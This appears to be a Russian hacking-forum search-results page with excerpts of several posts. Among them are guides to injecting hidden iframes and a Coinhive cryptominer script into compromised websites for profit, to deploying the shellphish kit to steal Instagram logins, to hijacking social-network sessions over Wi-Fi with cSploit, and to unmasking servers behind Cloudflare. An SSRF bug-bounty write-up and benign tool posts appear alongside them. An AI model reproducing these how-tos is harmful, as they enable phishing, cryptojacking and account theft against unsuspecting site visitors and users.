Jump to content
Новости и объявления.
  • Уважаемые гости. При посещении нашего сайта, просим вас ознакомиться с разделами форума, прежде чем оставлять ваши объявления и т.д. Рекомендуем посетить разделы: "Общение, Коммерческий раздел, Услуги Хакеров и статьи, Отзывы о сайте и пользователях, Черный список" и другие разделы нашего сайта. ***ВНИМАНИЕ*** При обращении за помощью, просим быть внимательными, на сайте есть, как проверенные специалисты, так и непроверенные. Если вы обратились к специалисту, который проверку НЕ проходил, рекомендуем воспользоваться услугой гарант сервиса. XAKERSAY.COM
  • Взлом
  • Взлом
  • Гарант-сервис
  • Реклама на форуме

Search the Community

Showing results for tags 'сайт'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • XAKERSAY
    • Hacker Forum news.
    • Transactions are the guarantor of the service.
    • A section for resolving controversial issues.
  • Общение.
    • A section for resolving controversial issues.
    • A section for resolving controversial issues.
  • Коммерческий раздел.
    • A trading platform on a hacker site.
    • Services related to communication, telephony, number substitution, etc.
    • Promotion, promotion, SEO, etc.
    • Sale-Purchase Of Cryptocurrencies.
  • Практика взлома, информация и т.д
    • Web vulnerability.
    • Social network
    • E-Mail (Mail).
    • Malware.
    • Soft Hacker
    • Freebie (I'll give it away for free).
    • Help with various software problems and computer problems.
  • Безопасность.
    • Help with malware infection.
    • Punishment for hacking.
    • Secure connection with IP address substitution and security articles.
  • XAKER (Hacker Services and articles).
    • Services of professional hackers (HACKING SERVICES)
    • Hacking services (REFUSED VERIFICATION).
    • About professional hackers (ARTICLES AND STORIES).
    • Requests for help.
  • Other topics, miscellaneous.
    • Reviews of hackers/programmers who helped you.
    • Reviews about our site and suggestions to change your opinion.
    • Reviews of third-party resources.
  • Реклама на форуме.
    • Advertising on the forum.
  • Черный список. (BLACK LIST).
    • BLACKLIST. Scammers and would-be hackers.
    • What methods scammers use to deceive users (Articles).
  • Разное.
    • Other topics, miscellaneous.
    • Other topics, miscellaneous.

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Сайт


ICQ


Yahoo


Skype


Город


Интересы

Found 14 results

  1. Приветствую, хакеры! При всех возможных попытках заняться арбитражом трафика, у большинства ребят возникают проблемы с технической частью самого перелива трафика. Поэтому я решил помочь с этим, и подсказать несколько хитрых вариантов сайтов-прокладок, которые не урежут ваши конверсии и хиты. Доверие любых сайтов Для начала вы должны понимать, что чем больше ваша "воронка", по которой идут ваши клиенты, и если что-то не открывается, или отображается криво, то вы теряете более 50% добытого вашего трафика. Поэтому у меня для вас найдено целых два решения этой проблемы, оба бесплатные и быстрые. Свой домен не потребуется и работать с дорогостоящими трекерами типа Keitaro тоже. Google сайт Неочевидный вариант, согласны? Хотя всегда под рукой. В своем или рабочем аккаунте гугла заходите в "Диск", нажимаете "Создать" и находите Google сайт: Наполняется он быстро, и вообще можно сделать прокладку по-классике одной качественной пикчей с текстом, в который встраиваете гиперссылки, как раз таки на вашу партнерку. Затем нажимаете "Опубликовать" настраиваете вид своей ссылки и публикуете его в общий доступ, затем у вас будет ссылка на него, которую вам нужно проверить, работают ли ваши кнопки и т.д. Он ,кстати, является адаптивным и открывается на разных устройствах. Canva Создаем шаблон под мобильную версию, и делаем на ней также пару кнопок, важным нюансом является то, что надо делать и текст и прямоугольник, который составляет внешний вид кнопки гиперссылкой. Затем нажимаете на три точки справа и "Поделиться ссылкой", всё, готово! Заключение Эти два варианта не только протестированы, а работают по сей день, и первым вариантом пользуются в работе с креативами в таргетированной рекламе фейсбука, который очень привередливый к тому, куда предлагают переходить пользователям.
  2. Всем привет, данная статья будет совсем не большой и даже не очень информативной. Но надеюсь я смогу донести до вас крупицу информации и это возможно натолкнет вас на дальнейшее изучение данной тематики и подобных инструментов. Итак, Ruler является инструментом, написанном на таком языке программирования, как Go (скорее всего никто о нем не знает), необходим он для взаимосвязи с Exchange-серверами при помощи протоколы HTTP и MAPI. Главной задачей является злоупотребление правилами почты на основе Outlook клиента, об этом было написано в данном блоге - https://silentbreaksecurity.com/malicious-outlook-rules/ Особенности инструмента: Пересчет действительных юзеровПросмотр свежих правил настроек почтыСоздание новейших вирусных правил почтыУничтожение определенных правил почты Включая это, Ruler пытается в режиме полуавтомата устанавливать взаимосвязь с Exchange, а также пользоваться сервисом Autodiscover, чтобы обнаружить нужные данные. Вот один из подобных примером брут-атаки: А также как пример получения shell Написал все, что планировал, если вы собираетесь дальше ознакомиться с этим, то можно почитать об этом в блоге создателей данной программы, ссылочка - https://sensepost.com/blog/2016/mapi-over-http-and-mailrule-pwnage/
  3. WhatWeb необходим для идентификации сайтов. Главной задачей является определить всю необходимую информацию о ресурсы. Данная программа способна определить технологии сайта, какие системы управления содержанием пользуется, библиотеки JS, а также различные сервисы. Программа использует более 1500 различных скриптов и плагинов. Каждый плагин занимается своей собственной задачей. Сервис способен узнавать номера версий почты, учеток, модулей сайта, ошибок в БД и т.п. WhatWeb работает в двух вариациях, незаметно и быстро, либо старательно и медленно. Ресурс находится в золотой середине между качеством и надежностью выполнения работы. При входе на сайт через браузер, вы получите большое количество информации о технологиях, использующих сайт. Обычно при переходе на страницу собирается достаточное количество информации для его сканирования, но если не повезло, программа способна тщательнее проанализировать всю информацию. Самым быстрым уровнем работы является – stealthy, для его выполнения необходимо только один HTTP запрос сайта. Такой метод хорошо подходит для анализа общедоступных сайтов. Агрессивные методы сканирования, созданы для проникновения в сайт. Практически все плагины сервиса исчерпывающие и узнают все от а до я. Итак, благодаря огромному числу особенностей и функций WhatWeb становится незаменимой вещью в сканировании различных веб-ресурсов. С помощью него можно определить практически все технологии сайтов. WhatWeb создан под Kali Linux, подробнее можно ознакомиться можно в интернете, а также найти примеры использования и руководство по эксплуатации.
  4. Всем привет. В этой небольшой статье я бы хотел рассказать про одну маленькую особенность такого “прекрасного” сервиса, который носит название temp-mail. Что переводится как временная почта. Итак, наверняка любой из нас любит полазить в интернете и поискать какую-то информацию, но когда мы на нее натыкаемся, то можем обнаружить, что она скрыта и нам нужно зарегистрироваться. Поэтому мы быстренько бежим и регистрируем новую почту. Конечно, можно воспользоваться сервисом temp-mail.org, он сильно облегчит жизнь и не засрет вам вашу личную почту. Но я хочу рассказать об обратной стороне данного почтового сервиса, из-за который я бы крайне не рекомендовал бы его использовать. Опасность данного сервиса Что же, заходим на сайт со своего обычного ИП-адреса и забираем почту: Отлично, теперь можем зарегистрироваться на первом встречном форуме, естественно указывая нашу временную почту и ожидаем письмj Письмо у нас, теперь нам нужно просто удалить данный ящик, чтобы все сообщения были “удалены” Ура! Вся наша информация удалена, и мы остались конфиденциальны. На самом деле, все не так как хотелось бы. Изменим свой ИП-адрес, после чего заходим на тот же сайт и нажимаем “Сменить” Когда введете всю информацию, то есть домен и имя почту, вы сохраняете это все и проверяете что из этого вышло. Видим все сообщения, выводы делайте соответсвующие.
  5. Здарова всем, сейчас расскажу и покажу как создать свой onion сайт в сети TOR, располагаться который будет прямо на установленной Kali Linux, никаких хостингов! Но, он будет работать только тогда, когда вы его запустите. Если вы хотите иметь красивый адрес вашего сайта, то начинаем сразу с первого пункта, если это вас не интересует – со второго. Пункт 1 Для работы нам нужна именно старая версия Кали. Для примера я буду использовать 1.0.6 На дальнейших версиях не работала. Найти можно в различных архивах. Нарезаем на болванке или же создаем live usb. Загружаем систему. Ждем подключения сети. После чего за работу возьмется Shallot. Shallot даст вам возможность создавать адреса .onion с определенными настройками. Косок адрес может быть случайным. Для установки делаем следующее. Скачаем Shallot с github Код: wget https://github.com/katmagic/Shallot/archive/master.zip Переходим в директорию Код: cd Shallot-master Дальше Код: ./configure make Производим запуск для примера Код: ./shallot ^name ------------------------------------------------------------------ Found matching domain after 30493976 tries: penistfobso4wxhr.onion ------------------------------------------------------------------ -----BEGIN RSA PRIVATE KEY----- MIICXgIBAAKBgQC+dO6h1GjQD0Hqn2LLBX0kIA9px/CtxV5yxMCjbk773igLvXDu v7N9Kr1FYB+yKuSWL/aCZttLqiqUA4L3cxI5Dgtk3bRKkmZre9qfH9xU9v+RSr5P BQmtp0AMi2wLiZxGggkoqcdIhKC4WWoD1xks0H//f7D+G+rdh4IMOHj7kQIEAPC0 RQKBgAwEVw9kxxu/SIugn3dDXJ2tq8V/uGNMBm02MnhckgvIS6S9wfB60mjy3FG/ SUPCWE/f5pUx8fNb3aPnIg2C5FlSE8hAfzdVBIP5F3S2KacSeCL+DPgCpcM8Tkfh s5AaqHe5Z+cb2pLE/1VXQpnnSQhLuSQFresIMCxnaBjOizzJAkEA4laycqQo2Guu eGkppcdNDRnlI4+bCslp2C4ZOuv8/DaLsQ/UE+RMrhdmJi48bcGBafcQlfewdyvL FpF6cpzjtQJBANdqdFilmRwCi1Ij4Q3dBubjjo5+WzxeZ0A6M6g5HDPFZBuHoXtI LNbSz5ilriQQ8fhKZi1HpwVWhNNLyIB3me0CQCdn1d98SwNP+gIfyvYT5ufxoBfH ElngrkQr4rYhsbCmSorxfen9gxI1hQVy4DsbTfttzSwJmOZ5P/CBG+HPFjUCQQCB gWh+P0wOCUDfkRDXdVd1Tb/7nbPbk8r+VlVgnz7fMNPYzjVkq2DTsRvk8uWTdMwQ bTDrrSiO0Wv5zxmMocT9AkEAkLfNSgZafRVmipGo9Fn78ZqedvZAqfYkwXgoIfrB MEq+FK1D3nyY9QDukbe6uR7k8gTfqTtqiHwIQ5JX7u6v7w== -----END RSA PRIVATE KEY----- Строку “name” заменяется на любое имя, которое захотите. Не забывайте, что чем длиннее слово, тем больше времени понадобится для генерации. Лучше всего не больше 6 символов. Полученные данные нужно сохранить в текстовый документ и сохранить на внешнем носителе. Пункт 2 В терминале вводим по порядку: Код: apt-get install tor apt-get install lighttpd Потом запускаем tor и lighttpd Код: service tor start service lighttpd start Необходимо чтобы они сделали конфигурации, для этого в etc, tor, torrc расскоментируем и привидем к такому виду строчки: Код: HiddenServiceDir /var/lib/tor/hidden_service/ HiddenServicePort 80 127.0.0.1:8080 А ниже впишем вот это: Код: ExcludeNodes {ru}, {ua}, {be} В /var/lib/tor/hidden_service имеется два файла hostname и private_key В первом файле записано имя вашего сайта, а во втором уникальный код. Если пункт 1 не был вами выполнен, то вы должны получить вывод в текстовом документе. Из него нам и нужно вписать необходимые значения. Если вы начинали со 2 пункта, то можете ничего не трогать. К примеру в hostname впишем nameforbso3xx.onion а в private_key: Код: -----BEGIN RSA PRIVATE KEY----- MIICXgIBAAKBgQC+dO6h1GjQD0Hqn2LLBX0kIA9px/CtxV5yxMCjbk773igLvXDu v7N9Kr1FYB+yKuSWL/aCZttLqiqUA4L3cxI5Dgtk3bRKkmZre9qfH9xU9v+RSr5P BQmtp0AMi2wLiZxGggkoqcdIhKC4WWoD1xks0H//f7D+G+rdh4IMOHj7kQIEAPC0 RQKBgAwEVw9kxxu/SIugn3dDXJ2tq8V/uGNMBm02MnhckgvIS6S9wfB60mjy3FG/ SUPCWE/f5pUx8fNb3aPnIg2C5FlSE8hAfzdVBIP5F3S2KacSeCL+DPgCpcM8Tkfh s5AaqHe5Z+cb2pLE/1VXQpnnSQhLuSQFresIMCxnaBjOizzJAkEA4laycqQo2Guu eGkppcdNDRnlI4+bCslp2C4ZOuv8/DaLsQ/UE+RMrhdmJi48bcGBafcQlfewdyvL FpF6cpzjtQJBANdqdFilmRwCi1Ij4Q3dBubjjo5+WzxeZ0A6M6g5HDPFZBuHoXtI LNbSz5ilriQQ8fhKZi1HpwVWhNNLyIB3me0CQCdn1d98SwNP+gIfyvYT5ufxoBfH ElngrkQr4rYhsbCmSorxfen9gxI1hQVy4DsbTfttzSwJmOZ5P/CBG+HPFjUCQQCB gWh+P0wOCUDfkRDXdVd1Tb/7nbPbk8r+VlVgnz7fMNPYzjVkq2DTsRvk8uWTdMwQ bTDrrSiO0Wv5zxmMocT9AkEAkLfNSgZafRVmipGo9Fn78ZqedvZAqfYkwXgoIfrB MEq+FK1D3nyY9QDukbe6uR7k8gTfqTtqiHwIQ5JX7u6v7w== -----END RSA PRIVATE KEY----- В /etc/lighttpd/lighttpd.conf поменяем значения: Код: server.document-root = "/var/www/onion" server.error-handler-404 = "/404.php" server.tag = "Ваше значение" server.port = 8080 $HTTP["remoteip"] !~ "127.0.0.1" { url.access-deny = ( "" ) } server.dir-listing = "disable" Пункт 3 Мы находимся во времена технологий, поэтому использовать движки можно в широких направлениях, в которых необходимы PHP и MySQL, поэтому прямо сейчас мы их добавим. Начнем с установки PHP Код: apt-get install php7.0-cgi Далее в /etc/php/7.0/cgi/php.ini ищем и потом раскомментируем строку: Код: cgi.fix_pathinfo = 1 Теперь в lighttpd нам нужно включить поддержку PHP Код: lighttpd-enable-mod fastcgi lighttpd-enable-mod fastcgi-php Пункт 4 В данном пункте мы установим на наш сайт MySQL, а также модуль PHP позволяющий работать вместе с ним. Код: apt-get install mysql-server php7.0-mysql Изначально MySQL использует для кодировки latin1, хотя многие другие движки работают с UTF-8. Поэтому нам нужно открыть /etc/mysql/my.cnf и добавить в секции [client] и [mysqld] данные строки: Код: [client] default-character-set=utf8 [mysqld] character_set_server=utf8 collation_server=utf8_unicode_ci Пункт 5 В /vat/www/ необходимо создать папку onion. Там мы будем размещать наш сайт. Создаем HTML-страницу для проверки, после чего сохраняем ее под названием index.html Код: Тестовая страница Site Local Тестовая страница. Веб-сервер работает и настроен правильно. Создаем PHP страницу ошибки и сохраняем ее как 404.php Код: 404 Site Local Ошибка 404. Страница не найдена. Произведем перезапуск службы: Код: service tor restart service lighttpd restart service mysql restart Пункт 6 В браузере TOR заходим на наш созданный onion-адрес и сразу замечаем результаты! Было бы неплохо в /root/***/tor-browser_en-US/Browser/TorBrowser/Data/Tor/torrc в самом низу добавить строчку ExcludeNodes {ru}, {ua}, {be} Для запуска сайта вводим строки в терминал: Код: service tor start service lighttpd start service mysql start Установим tor-arm который позволит управлять и вести контроль над трафиком Код: apt-get install arm
  6. Ищем уязвимости на сайте министерства обороны США, используя веб-приложение Jira и ряд других инструментов для анализа уровня безопасности. Во время сбора информации о военных сайтах в рамках Bug Bounty Department of Defense’s (дальше DoD) одним из специалистов было отмечено, что на нескольких из них используется популярное веб-приложение Jira, отслеживающее проблемы программного обеспечения. Позже внимание привлек твит, в котором активно обсуждали эксплуатацию SSRF в Jira. На базе полученных сведений ищем уязвимости и рассказываем, чем именно они опасны. Исследование первого веб-сайта началось с посещения google.com с помощью переменной consumerUri. Благодаря информации из блога Бретта Буэрхауса стало понятно, что любой экземпляр AWS может запрашивать IP и получать информацию, относящуюся к этому AWS, включая информацию об учетной записи, потому сперва было бы уместным проверить имя локального хоста через конечную точку метаданных AWS. При попытке получить учётные данные для их AWS было обнаружено, что на выполнение такой операции недостаточно прав. В этом случае лучшим решением стало прочтение AWS-документации и попытки запросить другие конфиденциальные данные, которые можно было бы извлечь. Нарушать правила DoD Bug Bounty не планировалось: «Ищем уязвимости, чтобы их устранить» — таков мотив. Именно поэтому были немедленно прекращены все тесты и отправлен первый репорт о найденных «брешах» в безопасности. Вскоре после этого репорт приняли. Специалист сообщил участнику команды на hackerone о намерении эксплуатировать уязвимость, чтобы доказать максимальную угрозу для безопасности. После краткой оценки репорта уязвимости присвоили среднюю степень угрозы для безопасности. С разрешения разработчиков и началась работа над максимальной эксплуатацией данного бага. Сперва были просканированы порты, чтобы узнать, есть ли какие-либо протоколы, которые можно вызвать. Протестированными оказались следующие порты: 21, (FTP)22, (SSH)80, (Web)443, (SSL Web)8080, (прокси)Данный перебор выявил различные ошибки, которые могут быть полезны в исследовании сервера и сети. Эта информация также была добавлена в отчетность для hackerone. Анализируя выявленные уязвимости, нельзя было не вспомнить о презентации исследователя Джеймса Кетли Cracking the Lens: Targeting HTTP’s Hidden Attack-Surface, в которой шла речь о возможности получить доступ к интрасети DoD и скрытым внутренним службам, доступным только для внутренних IP или из сервиса DoD. В видеопрезентации речь идет о двух таких веб-сайтах, доступ к которым может быть получен, если IP-адрес злоумышленника поступает с DoD сайта. Проверка обоих веб-сайтов DoD была продолжена, чтобы убедиться, можно ли получить хоть какой-то результат. При запросе URL из упомянутой Кетли статьи на первом испытуемом сайте отобразилось предупреждение USG, в то время как другой веб-сайт не отвечал на этот запрос вообще. В ходе данного теста также обнаружились и другие сервисы интрасети. Благодаря этому и стало возможным получить доступ к NIPRnet — не классифицированной внутренней сети протоколов, которая используется для обработки конфиденциальной информации. Она оказалась слишком чувствительной для работы с Интернета, но все же подтверждение того, что к ней можно получить доступ, уже имелось. Раскрыть внутренние службы и сайты не представляется возможным, так как они являются полностью конфиденциальными. После успешного взаимодействия с первым сайтом настал черед второго. Его оказалось сложно эксплуатировать. Он не выдавал подробных ошибок, как это делал вышеупомянутый ресурс. Тем не менее, после тестирования было обнаружено, что можно узнать о существовании определенных портов внутри локальной сети в зависимости от времени отклика (Blind SSRF). Например: время ответа 22 порта составило 1000 мс, тогда как запрос на 21 порт откликался за 10 000 мс. Кроме того, было непонятно, какие протоколы поддерживаются из-за отсутствия подробных ошибок. В итоге, сосредоточившись на ключевой цели, пришлось обратиться к NIPRnet. Был задействован Burp Сollaborator (это сервер postswigger), чтобы узнать, какая информация пришла на контролируемый сервер. Исходя из того, какие http-заголовки были в запросах, было отмечено, что они пропускали конфиденциальную информацию, включая заголовок «X-Forwarded-For», который сливался во внутренний IP-адрес. Закончив запрашивать все IP адреса, которые взаимодействовали со ссылкой на сервер Burp Collaborator, важно было проверить, произошли ли хоть малейшие изменения. Однако ничего не произошло. В этот момент также было обнаружено, что прочитать метаданные AWS не оказалось возможным, хотя запрос IP-адреса и серверов DoD-сети выполнился, как и на первом веб-сайте. Все же, специалист поспешил сообщить команде hackerone о своих находках, после чего Impact обоих отчетов увеличился до отметки «критично». Позже, пересматривая обе SSRF-уязвимости с низким Impact, обнаруженные ранее и зарепорченные не так давно, было принято решение привлечь внимание и к ним в надежде на увеличение оценки угрозы для безопасности. Эти две уязвимости заставляют использовать фильтр веб-приложений, злоупотребляя HTTP-подключением для запроса определенных IP-адресов. Запрос был довольно простым: нужно всего лишь отправить CONNECT IP, после чего можно перечислять службы DoD с помощью этого метода. Также оказалось возможным злоупотреблять заголовком хоста для выполнения запроса на аутентификацию для внутреннего IP или внешнего IP, например: militarywebsite.mil@internal_IP. Вернувшись к старым SSRF, было обнаружено, что можно выполнить Blind SSRF, запрашивая внутренние IP-адреса или службы, в результате чего страница сообщала, что истекло время ожидания, произошла ошибка SSL и др. После просьбы о пересмотре репорта уровень Impact был повышен до среднего. Лайфхаки для эксплуатации SSRF Во время исследований вышеперечисленных эксплойтов, специалист обнаружил, что в некоторых случаях эксплуатации возникает ошибка стека и утечка различной конфиденциальной информации. Причину, по которой это происходит, в конечном итоге так и не удалось найти. Обычно увидеть утечку информации можно, используя неполный HTTP-заголовок, например http:// или http://[::]. Конфиденциальная информация включает в себя IP-адрес базы данных, версию базы данных, используемые плагины, ОС, архитектуру ОС, etc. Также иногда на веб-сайте есть ссылки на другие экземпляры Altassian. Это открылось во время тестирования одного известного ресурса. Там был установлен Altassian на другом поддомене (из меню), на котором перечислены прочие сайты с Altassian, где присутствует данная уязвимость. Заключение Две устаревших версии Jira были уязвимы для вышеупомянутых эксплойтов SSRF. Они нужны для того, чтобы предоставлять доступ ко внутренним службам и сетям DoD. Было также обнаружено, что другой эксплуатируемый сайт позволял злоумышленнику просматривать конфиденциальный контент метаданных на сервисах AWS, содержащих идентификатор учетной записи, частный IP-адрес и другую конфиденциальную информацию, связанную с сервером и учетной записью. Злоумышленник мог использовать эти уязвимые веб-сайты для доступа ко внутренним AWS Министерства обороны. Хакер также мог использовать ресурсы для доступа к внутренней локальной сети Министерства обороны США. Это вполне могло бы привести к компрометации конфиденциальных данных и возможному сбою критически важных сервисов. Bug Bounty Министерства обороны имеет большой scope, в котором можно искать уязвимости. К тому же, они готовы работать с исследователями безопасности. В этой статье опубликованы наиболее распространенные проблемы и уникальные уязвимости, найденные в DoD. И помните: ищем уязвимости, чтобы устранять их, а не использовать в своих целях. Если вы хотите построить карьеру в области информационной безопасности, следуйте этому правилу.
  7. Приветствую всех, зарабатывать можно на любом сайте, поверьте. Главное – получить админку, а она есть везде. Суть заработка заключается в том, что мы будем показывать пользователям взломанного сайта наш контент, за просмотры которого нам заплатят. Как внедрять свой код в сайт, я рассказывать не буду, так как это огромная тема, ведь существуют десятки движков + самописные движки + лендинги и сайты вовсе без движков. Но концепцию опишу... Первое, что нужно понять – это то, что наш контент должен быть на каждой странице сайта. Прелесть сайтов на движке заключается в том, что код head (шапка сайта) и footer (подвал сайта) пишется 1 раз и подгружается на все страницы. И чтобы загрузить наш контент на все страницы сайта, нам необходимо внедрить код в footer или head. Платный фотохостинг Сайт, который платит нам за просмотры картинок, которые мы загрузили к ним на хостинг. Но для этого нам нужно, чтоб человек перешел по ссылке и просмотрел сайт с картинкой. – это главный инструмент, которым мы будем пользоваться. Суть его работы в том, что мы на странице одного сайта показываем другой или кусок другого сайта. Самый простой пример – это Яндекс/Гугл карта в объявлении на том же Авито. Регистрируемся на платном фотохостинге, загружаем картинку, получаем ссылку. Заходим в админку взломанного сайта и ищем, как нам вставить свой код в шапку сайта. И вставляем следующий код: Разберем, что это такое: – это тег html. Что он делает, я уже рассказал; src="" – атрибут тега. В нашем случае – это ссылка на сайт, который нам надо показать пользователю; width="1px" – атрибут тега, ширина фрейма. Ставим 1 пиксель, чтоб его не было видно; height="1px" – атрибут тега, высота фрейма. Ставим 1 пиксель, чтоб не сдвигать уже существующие элементы сайта, иначе реальный админ будет искать причины того, что у него сайт "поехал", и найдет наш код. align="left" – атрибут тега. Прижимает фрейм к левому краю и разрешает другим элементам располагаться справа него. В результате этого пользователь просматривает нашу картинку, сам не замечая этого. Минусы – фотохостинги платят за целевой трафик, нам нужно будет несколько аккаунтов под несколько групп стран. Плюсы – беспалевность, пассив, простота реализации. Прибыльность – фотохостинги платят 100-230 рублей за 1000 просмотров. Теперь допустим, что у нас 10 сайтов с посещаемостью 100 человек в сутки. В результате у нас 1000 просмотров каждый день. Накрутка посетителей на нашем сайте Тут все просто, как дважды два. Создаем сайт, подключаем Яндекс/Гугл директ и делаем тоже самое. Только вместо ссылки от фотохостинга вставляем ссылку на страницу нашего сайта: Минусы – нужно вставлять ссылки на разные страницы сайта, нужно создавать сайт и возиться с директом. Плюсы – явных не наблюдается. Еще, как вариант, можно продавать посетителей другим владельцам сайтов, но тут тоже нужно нормально попотеть, и это уже не будет пассивным заработком. По поводу прибыльности ничего однозначного сказать не могу, так как реклама оценивается по-разному, в зависимости от тематики. Но за 1000 показов будет больше, чем платят фотохостинги. Майнер Относительно недавно сервис Coinhive подарил нам возможность майнить мощностями пользователя сайта. А кто сказал, что это должен быть пользователь нашего сайта? Регистрируемся на сайте Coinhive (ссылка выше), заходим в админку ломаного сайта и внедряем следующий скрипт: var miner = new CoinHive.Anonymous('YOUR_SITE_KEY'); miner.start(); Значение YOUR_SITE_KEY – берем в настройках на сайте, а сам скрипт подробно разбирается на сайте. Минусы – с недавних пор майнер не запускается автоматически (в начале загрузки сайта выскакивает баннер, в котором пользователь разрешает/отказывается майнить), майнер сильно грузит ПК пользователя, что может привести к проверке кода админом и последующему выявлению нашего скрипта (не учитывая баннера на весь экран). Плюсы – майнинг в тренде. Прибыльность – зависит от времени, на протяжении которого пользователь находится на сайте и мощности машины пользователя. Написанная информация в статье несет исключительно ознакомительный характер, чтобы дать возможность пользователю обезопасить себя. Автор не несет ответсвенности за использование данной информации личных корыстных целях.
  8. Привет всем, сейчас я хочу рассказать вам о том, как же можно украсть учетные записи от социальных сетей с помощью точки доступа и Андройда. Теоретическая часть Итак, передаваемая и получаемая информация шифруется. Нас не должно интересовать как идет передача пакетов, это не входит в нашу статью. Нас должно интересовать, как пакеты совершают обратное действие датаграмм к пользователю. Когда HTTP запрос был обработан, сервер начинает проверку прав клиента на использования GET запросов, если отклик был положительным, то сервер сразу же выдает контент, который был запрошен, после чего совершает его шифрование и отправляет полученные данные обратно. Тот кто ворует дынные не может воспользоваться GET запросом, так доступ к нему имеет только тот, кто владеет данными. Однако, это не значит, что хакер должен самостоятельно отсылать этот запрос, ведь за него это может сделать сама жертва. Для этого нам и понадобится WiFi. Все что нужно – это в определенное время поймать пакет с данными, который как ни крути всегда будет проходить через подсеть, после чего мы записываем куки и у нас все отлично. Чтобы провернуть это дело на Андроид существует cSploit Практическая часть Что же, данная программа официально предназначена для того, чтобы совершать сканирование точек доступа на их безопасность, однако ее способности мы будем применять в другом русле, конечно же все по закону. Помните! Чтобы программа работала ей нужны рут-права а так же библиотеки BusyBox. Инструкция Установка необходимых компонентовУстановка cSploitПосле удачной установки всего необходимого вы сможете увидеть все подключенные устройства к сетиНеобходимо выбрать жертву и нажать по нейПерейти в раздел MITMДалее переходим в раздел сниффер сессийЖдем или убеждаем человека на то, чтобы он зашел в свою социальную сетьПосле входа в аккаунт вы сможете перехватить сессию жертвуОтлично, мы открыли страничку жертву в браузере.Я считаю, что я наглядно вам показал, что совершать такие мелкие взломы совсем не тяжело. Для этого не нужно ни в чем разбираться и быть феноменальным человек, при должной тренировке этому можно научить даже обезьяну. Данная информация предоставлена лишь для ознакомления, и для того, чтобы обезопасить пользователей интернета. Автор не несет ответственности за использование данной информации в корыстных целях.
  9. Всем привет, сейчас я вам хочу рассказать о том, как же можно очень быстро создать фишинговый сайт. Кто незнаком с этим понятием – то прошу ознакомиться, а если говорить проще, то это поддельный сайт. Итак, для работы на понадобится операционная система Kali Linux, после чего надо открыть ее консоль и ввести данную команду: git clone https://github.com/thelinuxchoice/shellphish Отлично, теперь здесь нам надо прописать данные команды: cd shellphish bash shellphish.sh Теперь из предложенных вариантов фишинговых сайтов мы должны выбрать нам необходимый. В качестве примера мною будет выбран фишинговый сайт для Инстаграм. Нам на выбор будет предоставлено несколько способов, я же выберу способ под номером 01, после чего нам нужно будет прописать порт, в случае его отсутствия – пропустить его ввод. Итак, мы видим данную ссылку, нам необходимо ее скопировать и вставить в адресную строку. Как вы видите, фейковая страничка была успешно создана, переходя по которой жертва введет свои данные для входа в аккаунт. После этого жертву перекидывает на официальный сайт инстаграм, если че пользователь уже был авторизован, то сразу же будет открыта его страничка в соц. сети. В то время как жертва отправляем нам свои данные, мы их получаем прямо в консоли, где мы может узнать IP, местонахождение и так далее. А вот после непосредственного нажатия кнопки входа мы получим данные вида: логин и пароль. Как вы видите это занимает кране много времени, но это не меняет того, что данный метод взлома страничек является очень эффективным.
  10. Cloudflare – это некая прокладка между посетителем и самим сайтом. Она работает в виде прокси, только в обратную сторону, тем самым давая некоторые возможности в виде кэширования страничек, защиту от ддос-атака, ботов и так далее. Также cloudflare маскирует настоящий ип-адрес сервера, на котором стоит сам сайт. Он использует собственные сервера имен, которые необходимы для отправки ответов на DNS-запросы и преобразование имя хоста в ип-адрес. Это значит, что создатель сайта использует для своего домена NS-сервера, они в ответ на DNS-запрос отсылают его в cloudflare, при этом получив страницу сервера, где находится сайт, после чего показывает данный сайт посетителю, которые сделал на это запрос. Это значит, что после этого настоящий ип-адрес неплохо скрывается. Если cloudflare будет правильно настроен, то истинный ип-адрес вычислить будет невозможно, ведь он никогда не раскрывается и никуда не записывается. Однако как мы знаем, людям свойственно ошибаться, это не стало исключением. Именно поэтому сегодня создают утилиты, которые пытаются найти уязвимости в опциях Cloudflare. Например, я могу рассказать о такой утилите, как CloudFail. Собственно именно об этой программе и пойдет речь в данной статье. Что такое CloudFail и как он работает Независимо от типа сайта он может иметь поддомен, как пример: site.org.ru. Количество таких доменов является неограниченным, а каждый такой домен может иметь собственный ип-адрес. Это значит что для site.org записывается один ип-адрес, для site.org.ru записывается уже другой ип-адрес и так по нарастающей. Бывают такие моменты, когда в DNS-записях первого домена написан адрес cloudflare, а это значит что DNS-записи для поддомена данного сайта ведут на другой ип-адрес, который не подключен к защите от cloudlfare. Это значит, что настоязий ип-адрес может быть раскрыт. Просто так мы не можем получить весь список субдоменов. А это значит все варианты нужно будет перебирать и пересматривать. Как раз таки это и реализуется в данной программе. Често говоря, выполнение данных процессов являетя 3-ей стадией. На 1 данная программа получает список все возможных субдоменов, после чего проводит их проверку. На 2 стадии этот инструмент обращается к CrimeFlrae, который имеет у себя в распоряжении огромную базу ип-адресов использующихся для сайтов и находящихся под защитой cloudflare. Если сайт знает какой-то из этих ип-адресов, то он сразу же будет показан. Теперь уже на 3 стадии будет выполнен брут субдоменов по словарю. После проделывания данных пунктов, найти ип-адрес, который не будет защищен cloudflare, становиться не проблемой. Как установить CloudFail Чтобы установит данную программу, вы должны иметь любую Unix-подобную операционную систему, после чего в ней ввести данную команду: sudo apt update sudo apt install python3-pip git tor git clone https://github.com/m0rtem/CloudFail cd CloudFail/ sudo pip3 install -r requirements.txt Чтобы проверить работоспособность программы прописываем: python3 cloudfail.py -h Также перед тем как запустит программу в первый раз, а также примерно каждый месяц, стоит проверять ее на наличие обновление, делается это с помощью данной команды: sudo python3 cloudfail.py –u После его скачивания будет произведено обновление всех ип-адресов cloudflare, а также БД для CrimeFlare. Если вы хотите использовать программу через луковую сеть, то вам будет нужно запустить службу Tor: sudo systemctl start tor Если же вы не собираетесь использовать данную сеть, то данный шаг можно смело пропускать. Строчка is part of the Cloudlflare network! Означает, что данный сайт находится под защитой cloudflare. Если бы защиты не было бы, то сканирование сразу же остановилось, ведь в случае отсутствия защиты, данный скан является абсолютно бессмысленным. Строчка Testing for misconfigured DNS using dnsdumpster… означает, что первый этап получения известных субдоменов начался. Как вы могли заметить, в данных результат среди DNS-записей мы можем заметить MX-записи, которые ведут нас на сервисы электронной почты. Посмотрите внимательнее, в данном случае эти записи ведут нас не на субдомены, а на хосты Гугла. Об этом также свидетельствуют ип-адреса. Данные хосты не находятся под защитой, однако для нахождения настоящего 